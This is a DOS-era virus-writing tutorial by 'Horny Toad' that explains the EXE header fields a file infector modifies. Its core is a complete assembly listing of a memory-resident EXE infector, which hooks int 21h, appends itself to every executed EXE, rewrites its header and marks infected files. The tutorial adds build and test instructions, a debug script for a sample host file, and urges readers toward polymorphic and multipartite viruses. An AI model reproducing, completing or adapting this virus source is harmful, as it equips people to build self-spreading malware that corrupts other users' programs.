                                 Lesson 4
                          Guide To EXE Infection
                                    By
                                Horny Toad
                              



        Now onto the 4th lesson, EXE file infection.  Boy, the topics
never seem to get any easier, do they?  The difficult aspect of EXE
infection is that there is no ONE technique to cover all forms of EXE
infection.  I will, therefore, keep to the basics in this tutorial and
in later articles, address different techniques which you can use.


What is an EXE file?
---------------------
        One of the first things that we need to do is understand what
an EXE file is and more importantly what it looks like.  Quite simply,
an EXE file is an improvement over the COM file format in that allows
the program size to exceed one segment (64k).  COM programs are limited
to 64K, including 256 bytes for the PSP.  EXE files, on the other hand
can occupy a much larger space by using more than one segment.  The
limit on an EXE file's size is the amount of memory/hard drive space you
have. There are other characteristics that differ between the EXE and COM
formats.  In a COM file, the stack is automatically defined, whereas,
in an EXE file, you need to initialize it yourself.  This is probably
the single most difficult concept to grasp when writing EXE files, the
stack.  Care must be taken that you define the stack large enough to
handle all of the push and pop instructions that your program will use.
If your stack is to small, your program is sure to crash.  The next
difference in the two file formats is the initializing of data segment.
In a COM file, the data segment is defined as an area within the code
segment.  Since a COM file only uses one segment anyway, the data,
code, and stack segments can all fall right together.  Very convienient
right?  Well, in an EXE file, after the program loader puts the file
in memory, both DS and ES contain the address of the PSP!  Remember
that!  Always remember to load the address of the data segment into
ds when coding EXE files.
        At the heart of the EXE file format lies the EXE header. The
EXE header is a minimum of 32 bytes that is used to describe a
multitude of information about how the program needs to be loaded.
Why I say that the header is the heart of the EXE file format, is that
a virus which attacks EXE files, needs to utilize practically all of
the information in the header.  Therefore, pay attention so that you
thoroughly understand this concept.

Let's take a look at the EXE header format:

The length of each element in the EXE header is 2 bytes (1 WORD).
The descriptive names of each element in the header are the traditional
names that have been used size the EXE file was created.  You can
give them whatever symbolic name you want to in you virus.


                           EXE Header Format

Offset          Length          Content         Description
-----------------------------------------------------------------------
0h              2               4Dh 5Ah         EXE file signature "MZ"

2h              2               PartPag         Length of last non-full
                                                page.
4h              2               PagCnt          Length of program in 512
                                                byte pages
6h              2               ReloCnt         Number of elements in
                                                the relocation table
8h              2               HdrSize         Header length in 
                                                paragraphs
0Ah             2               MinMem          Minimum memory left in
                                                paragraphs.
0Ch             2               MaxMem          Maximum memory left in
                                                paragraphs.
0Eh             2               ReloSS          Segment correction for
                                                stack (SS)
10h             2               ExeSP           Value of stack pointer
                                                (SP)
12h             2               ChkSum          Checksum

14h             2               ExeIP           Value of instruction
                                                pointer (IP)
16h             2               ReloCS          Segment correction for
                                                CS
18h             2               TablOff         Offset for the first
                                                relocation element
1Ah             2               Overlay         Overlay number

               
That looks very pretty, but how does it actually look?  To tell you the
truth, looking at the EXE header in DEBUG makes it look so much more
simpler.  The only catch is that you need to rename the extension to
something other than ".EXE" in order to view the header.  You can, if
you know the exact program address, use the DEBUG L command to load
a certain sector from a disk and then (D)isplay the contents of the
sector.  Nahh!  Too complicated.  Just rename the damn thing.  Make
sure that you have read Horny Toad & Opic's guide to disassembly and
understand how to use DEBUG.  I have included some sample files in this
tutorial to give you some hands-on work with EXE files.  One of the
samples is a basic do-nothing EXE file.  Let's say that I called this
file someExe.exe. Below, I will display the contents of the someExe
header.

At a prompt, type:

c:\>debug someExe.eww
-d

??:0100  4D 5A 11 00 02 00 01 00-20 00 11 00 FF FF 02 00  MZ...... .......
??:0110  00 01 00 00 00 00 00 00-3E 00 00 00 01 00 FB 71  ........>......q
??:0120  6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00  jr..............

For an easier to read version of the same information, use SPo0ky's
EXE header reader for the following results:

EXE Signature ........................................ MZ
Size of Last Page .................................... 0011
Number of 512 byte pages in file ..................... 0002
Number of Relocation Entries ......................... 0001
Header size in Paragraphs ............................ 0020
Minimum additional Memory required in paragraphs ..... 0011
Maximum additional Memory required in paragraphs ..... FFFF
Initial SS relative to start of file ................. 0002
Initial SP ........................................... 0100
Checksum (unused) .................................... 0000
Initial IP ........................................... 0000
Initial CS relative to start of file ................. 0000
Offset within Header of Relocation Table ............. 003E
Overlay Number ....................................... 0000

Relocation Table Entries:
        0000:0001


However you choose to read the EXE header is fine.  At this point,
just make sure that you are aware of its existance.

I have begun including the debug scripts of the programs that I use in
the tutorial so that people who do not have access to the Codebreakers
magazine can extract all of the sample programs from the tutorial with
the help of debug. The debug usage differs slightly from the other
tutorials, so make sure you read the instructions at the end of this
file.

Now, let's take a look at the individual contants of the EXE header
and identify their function in the infection process.


EXE signature
-------------
The first word in the header is the traditional EXE file signature "MZ".
These are the initials of Mark Zbikowski, the programmer who designed
the EXE file format.  Obviously, you already know from my last tutorial
that you can use this unique signature to identify whether or not the
file is of the EXE format.


PartPag and PagCnt (need to be modified)
------------------
PartPag and PagCnt make up the entire file size including header.
PageCnt, as the name implies, is the length of the file expressed
in 512 byte pages.  PartPag is the amount of bytes that are on the
last page of PageCnt.  PartPag is expressed as length of the file
mod 512.  Mod.  You better learn this concept now, because it will
follow you on into higher programming languages such as C++.

5 % 2 = 1
5 / 2 = 2

The mod (%) is the remainder left over after division has taken place
in non-floating point numbers.  Simple enough.  PartPag and PagCnt will
need to be modified to allow for the inclusion of you virus code.


ReloCnt
-------
The next item in the header represents the number of items in the
relocation table.  What the hell is a relocation table?  A relocation
table contains two words (offset,segment) for each element in the
program that needs to be adjusted to account for segment location.
You can skip over this because you will not have to make any
modifications here but...
        In the relocation table, both words are read and a relative
        segment address is computed by the sum of the loading segment
        address (usually PSP seg + 10h) and the segment address to the
        element that needs adjusting.  The loading segment is then
        added to the element in memory at the relative segment
        address/offset.


HdrSize
-------
The next element of the header is the header size.  Quite self
explanatory, the HdrSize holds the size of the header in 16-byte
paragraphs.  With the information that you have thus far seen, you
can determine the actual bare program size with the equation:

        Size=((PagCnt*512)-(HdrSize*16))-(512-PartPag)

You will also not have to fool with the header size.


MinMem & MaxMem
---------------
Shall we also have another obvious two contents: MinMem and MaxMem?
These two values are used to allocate the amount of memory for the
program.

                            
ReloSS & ExeSP   (need to be modified)
--------------
ReloSS and ExeSP are two items that need to be changed to account for
the addition of code that you have just appended.  ReloSS added with
the starting segment address will give you your SS register.

Checksum         (should be modified)
--------
The Checksum item is the traditional place to store an infection
marker.  

ReloCS & ExeIP   (need to be modified)
--------------
ReloCS is definitely an important item.  The item stored here, along
with the ExeIP, represents the beginning address to our virus code.
This value will be initially saved from the host program so that it
can be recalled and control returned back to the host.

TablOff
--------
This is the offset to the first relocation element in the file.


Overlay
-------
If this is the program main module, the value should be zero.


Below is a simple resident EXE infector.  I choose to include a
resident virus rather then a direct action infector, because I
believe that, if you can write a resident EXE infector, making it
non-resident would be a piece of cake.  One thing that I was
considering to do was to follow the modular style of coding that I
used in the last tutorial.  One trend that I was seeing in many
viruses was that people were simply copying the code.  After Slam #4
was released, you have no idea how many EXE infectors started to
hit the scene that were essentially a word for word copy.  Whatever.
In the end, I decided to include the virus below so that you can
see everything working in one virus, rather than the modular style
of instruction.  I am not sure which way is better, so I will probably
continue to switch back and forth between styles.  Another thing,
while I am in the preaching mode, from now on, I will not be explaining
the most basic concepts of assembly.  If you have been following
along with the tutorials, you should understand every concept that is
in this tutorial.  Really, the only new aspect that you need to be
aware of with EXE infection is that you need to change certain values
in the header to accomodate your virus.  You already know how to do
this.  In the beginning tutorials, you played around with elements of
the DTA.  Well, you are going to be doing the same thing with the
header, reading it into a buffer and reading and modifying the values
that I have pointed out above.


.286
virus segment
  assume cs:virus, ds:virus, es:virus

 jumps
 org 0CBh

start:

  call delta                        ;Calculate delta offset
delta:
  pop bp
  sub bp,offset delta

  push ds                           ;save PSP address

  push cs cs
  pop ds es

  mov ax,0CBCBh                     ;our "Codebreaker" residency check
  int 21h                           ;>what is CB?
  cmp bx,0C001h                     ;>C001!! :o)
  je restore                        ;its already resident

  pop ds                            
  push ds                           ;PSP address back into DS
  ;--------------------------------------------------
  mov ax,ds                                 ;MCB residency
  dec ax                                    ;For further clarification
  mov ds,ax                                 ;read Codebreaker Tutorial 3

  sub word ptr ds:[3],40h
  sub word ptr ds:[12h],40h

  xor ax,ax
  mov ds,ax

  dec word ptr ds:[413h]

  mov ax,word ptr ds:[413h]
  shl ax,6

  mov es,ax

  push cs
  pop ds

  lea si,[bp+start]
  xor di,di
  mov cx,the_end - start
  rep movsb
  ;--------------------------------------------------
  xor ax,ax                                 ;Setting of interrupts
  mov ds,ax                                 ;For further clarification
                                            ;read Codebreaker Tutorial 3
  mov ax,es                                 
  mov bx,new_int21h-start
  cli
  xchg bx,word ptr ds:[21h*4]
  xchg ax,word ptr ds:[21h*4+2]
  mov word ptr es:[old_int21h-start],bx
  mov word ptr es:[old_int21h+2-start],ax
  sti
  ;--------------------------------------------------
  push cs cs
  pop ds es

  mov ah,9                                  ;Warns the poor shmuck
  lea dx,[bp+message]
  int 21h

restore:                                    ;Control handed back

  lea si,[bp+old_ip]                        ;Restore orig IP
  lea di,[bp+original_ip]
  mov cx,4
  rep movsw

; Now for a clarification of the next four lines. At the beginning of
; the virus DS contains the address of the PSP. We now restore the
; address from the stack, place the address in ES.  Then add 10h to
; skip over the PSP.  Skip over the PSP(100h) with 10h? Sounds a little
; fishy, right?  Well, remember that when you add 10h to AX, you are
; adding 10h segments. Each segment is 10h bytes, so 10h*10h=100h (PSP)

  pop ds
  mov ax,ds
  mov es,ax
  add ax,10h

  add word ptr cs:[bp+original_cs],ax       ;Orig CS
  cli
  add ax,word ptr cs:[bp+original_ss]       ;Orig SS
  mov ss,ax
  mov sp,word ptr cs:[bp+original_sp]       ;Orig SP
  sti

 db 0eah                                    ;jump to to it
 original_ip dw ?                           ;
 original_cs dw ?
 original_ss dw ?
 original_sp dw ?


 new_int21h:                                ;our int 21h handler
  pushf                                     ;push the flags
  cmp ax,0CBCBh                             ;residency check
  jne no_install_check
  mov bx,0C001h                             ;already resident
  popf                                      ;restore all flags
  iret                                      ;return
 no_install_check:
  cmp ah,4bh                                ;check if execute
  je infect
 return:
  popf                                      ;restore all flags
 db 0eah                                    ;jmp to orig int 21h
 old_int21h dd ?

 infect:
  pusha                                     ;only 286, saves all gen reg
  push ds
  push es

  call tsr_delta
 tsr_delta:
  pop bp                                    ;a tsr delta offset %-)
  sub bp,offset tsr_delta

  mov ax,3d02h                              ;open file in DS:DX
  int 21h
  jc exit

  xchg ax,bx                                ;file handle to bx

  push cs cs
  pop ds es

  mov ah,3fh                                ;Read the target header
  lea dx,[bp+header]                        ;into our buffer
  mov cx,1ch
  int 21h

  cmp word ptr cs:[bp+header],'ZM'          ;check if its an EXE
  je ok
  cmp word ptr cs:[bp+header],'MZ'
  je ok
  jmp close

 ok:
  cmp word ptr cs:[bp+header+12h],'BC'      ;Checksum value checked for
  je close                                  ;previous infection

  mov word ptr cs:[bp+header+12h],'BC'      ;Mark it as infected

  mov ax,word ptr cs:[bp+header+14h]        ;Save orig ExeIP
  mov word ptr cs:[bp+old_ip],ax            ;Store in our buffer
  mov ax,word ptr cs:[bp+header+16h]        ;Save orig ReloCS
  mov word ptr cs:[bp+old_cs],ax            
  mov ax,word ptr cs:[bp+header+0eh]        ;Save orig ReloSS
  mov word ptr cs:[bp+old_ss],ax
  mov ax,word ptr cs:[bp+header+10h]        ;Save orig ExeSP
  mov word ptr cs:[bp+old_sp],ax

  mov ax,4202h                              ;Set pointer to end of file
  xor cx,cx
  xor dx,dx
  int 21h

  push ax dx                                ;Save EOF results

                                            ;Calculate new CS:IP, we set
                                            ;it to the EOF (this is where
                                            ;we will attach our virus)

  mov cx,16                                 ;Convert filesize into 16 byte
  div cx                                    ;paragraphs

  sub ax,word ptr cs:[bp+header+8]          ;Substract Header size from
                                            ;filesize to get the image
                                            ;(code/data) size.

                                            ;save:
  mov word ptr cs:[bp+header+14h],dx        ;New ExeIP
  mov word ptr cs:[bp+header+16h],ax        ;New ReloCS

  pop dx ax                                 ;restore saved filesize

  add ax,the_end - start                    ;Add virus size to file size
  adc dx,0                                  ;Adds carry to DX

  mov cx,512                                ;Calculate amount of pages
  div cx

  cmp dx,0
  je no_remainder
  inc ax                                    ;if remainder, add 1
 no_remainder:

  mov word ptr cs:[bp+header+4],ax          ;New PageCnt
  mov word ptr cs:[bp+header+2],dx          ;New PartPag

  mov ah,40h                                ;write the virus to the EOF
  lea dx,[bp+start]
  mov cx,the_end - start
  int 21h

  mov ax,4200h                              ;Send pointer to beginning
  xor cx,cx
  xor dx,dx
  int 21h

  mov ah,40h                                ;Write the new header
  lea dx,[bp+header]
  mov cx,1ch
  int 21h

mov al,7
int 29h                                     ; just a BEEEEEPPP

 close:
  mov ah,3eh                                ;close file
  int 21h

 exit:
  pop es
  pop ds
  popa
  jmp return


 old_ip dw offset exit_prog
 old_cs dw 0
 old_ss dw 0
 old_sp dw 0fffeh

 header db 1ch dup(?)                       ;Buffer for header

 message db 10,13,10,13
 db '- SPo0ky''s EXAMPLE TSR EXE infector for Horny Toad''s ''Guide To EXE Infection'' -',10,13
 db '- has been installed in your computers memory and will from now on infect any -',10,13
 db '- EXE file that you execute.                                                  -',10,13
 db '- You can use TBCLEAN (www.thunderbyte.com) to clean this virus.              -',10,13,10,13
 db '                           - www.codebreakers.org -',10,13,'$'

 the_end:

 exit_prog:
  mov ax,4c00h                              ;Request terminate program
  int 21h
 
virus ends
end start


In order to see the above virus work.  Cut the virus out of this file
and save it in a file exevir.asm.

At a prompt with TASM/TLINK in the same directory, type:

c:\>tasm exevir.asm
c:\>tlink exevir.obj

Use the myexe.exe (below) as the host program.  With both of the
programs in the same directory, execute the virus, then execute
the host program.  If you look at the filesize using the
(dir)ectory command, you will see that it has increased in length.
Test this virus in a MSDOS box from windows and when you exit out
of the MSDOS box, the virus will be gone. If you check the header
now, you will be able to see the changes made after infection. Take
a look at that beautiful "CB" infection marker.


??:0100  4D 5A 5A 01 03 00 01 00-20 00 11 00 FF FF 02 00   MZZ..... .......
??:0110  00 01 43 42 01 00 01 00-3E 00 00 00 01 00 FB 71   ..CB....>......q
??:0120  6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00   jr..............



        To write the definitive guide to all forms of EXE infection, I
would need to quit my day job (which I've thought of doing) and just
write a book.  In the end it is better to have a bunch of installments
attacking each issue and facet of virus writing.  Look for the future
Codebreaker tutorials become much more specific and advanced.  If you
can understand how to infect COM and EXE files, along with what role
encryption and polymorphism can aid in virus effectivness, you are well
on you way to making some really awesome creations.  The only thing
that you need to add from here is some boot infection techniques to
the virus and watch out, you'll have a decent multipartide virus. I
guess my one piece of advice now is to read code and absorb it.  Start
to become critical of others code and use that knowledge and judgement
to develope your own style.  Enough preaching!


Have fun!

Good luck!

Horny Toad



SAMPLE PROGRAMS USED IN TUTORIAL
--------------------------------
In order to extract this sample program, cut it out of this file and
paste it into a file named "myexe.txt".

At the prompt, type:

c:\>debug < myexe.txt
c:\>rename myexe.exd myexe.exe

You will then have a sample infectable EXE file.



N MYEXE.EXD
E 0100 4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 
E 0110 00 01 00 00 00 00 00 00 3E 00 00 00 01 00 FB 71 
E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 
E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0300 B8 01 00 8E D8 8E C0 B4 4C A0 00 00 CD 21 00 00 
E 0310 00 
RCX
0211
W
Q

